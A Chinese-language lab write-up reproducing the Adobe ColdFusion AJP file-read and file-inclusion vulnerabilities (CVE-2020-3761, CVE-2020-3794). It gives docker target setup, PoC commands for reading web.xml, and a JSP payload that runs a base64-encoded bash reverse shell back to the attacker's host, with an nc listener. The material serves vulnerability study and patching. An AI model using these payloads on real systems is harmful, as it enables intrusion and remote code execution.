Adobe ColdFusion 任意文件读取和任意文件包含漏洞复现CVE-2020-3761 CVE-2020-3794

1、漏洞描述

2020年3月18日，Adobe官方发布针对Adobe Coldfusion的安全更新补丁，编号为APSB20-16。补丁中包含Adobe ColdFusion 任意文件读取和任意文件包含漏洞，CVE编号分别为CVE-2020-3761，CVE-2020-3794。
由于AJP协议设计存在缺陷导致内部相关的属性可控，攻击者可以构造属性值，实现漏洞的利用，成功利用这些漏洞可导致获得敏感文件信息，甚至可以进行远程代码执行漏洞的利用。

注：此漏洞与之前爆出的Tomcat文件包含漏洞CVE-2020-1938的利用方式相同，利用ajp协议设计缺陷，攻击者可以构造内部属性值，通过控制
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path

影响版本

ColdFusion 2016 Update13及之前版本
ColdFusion 2018 Update7及之前版本

环境搭建

使用docker环境快速安装，没有docker请转

https://blog.csdn.net/HcJsJqJSSM/article/details/85918437

靶机ubuntu：IP：192.168.64.140
攻击机kali ：IP：192.168.64.147
1、获取漏洞docker 镜像：
docker pull accent/coldfusion2016
2、启动docker容器：
docker run -d -p 1099:1099 -p 8016:8016 -p 8433:8433 -p 8011:8011 -p 8500:8500 --name “coldfusion_rce” accent/coldfusi

3、验证是否安装成功：访问靶机IP+端，http://192.168.64.140:8500/

漏洞复现

1、POC下载：

https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read

#此漏洞POC与Apache Tomcat存在文件包含漏洞 AJP CVE-2020-1938 POC一致
2、文件读取漏洞：读取 /WEB-INF/web.xml ：python Tomcat-ROOT路径下文件读取(CVE-2020-1938).py -p 8016 -f /web.xml 192.168.64.140
注：是8016端口，非8500端口。
server.xml， 8016是AJP端口

web.xml文件内容：

3、文件包含漏洞：靶机环境下将反弹shell脚本test.txt放至docker 容器内 /opt/coldfusion2016/cfusion/wwwroot目录

sehll：bash -i >& /dev/tcp/192.168.64.147/8881 0>&1，使用bash pyload进行编码

http://www.jackson-t.ca/runtime-exec-payloads.html

test.txt：

<%
    java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjE0Ny84ODgxIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("
");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("
");
%>

kali ：nc -lvp 8881 #监听反弹shell 的8881端口
执行POC：python Tomcat-ROOT路径下文件包含(CVE-2020-1938).py -p 8016 -f /test.txt 192.168.64.140
getshell:

漏洞修复

官方已经针对此漏洞发布APSB20-16补丁，请受影响的用户参考以下链接安装补丁更新：https://helpx.adobe.com/security/products/coldfusion/apsb20-16.html

说明

此文档仅作为Adobe ColdFusion 任意文件读取和任意文件包含漏洞复现学习，不可恶意使用。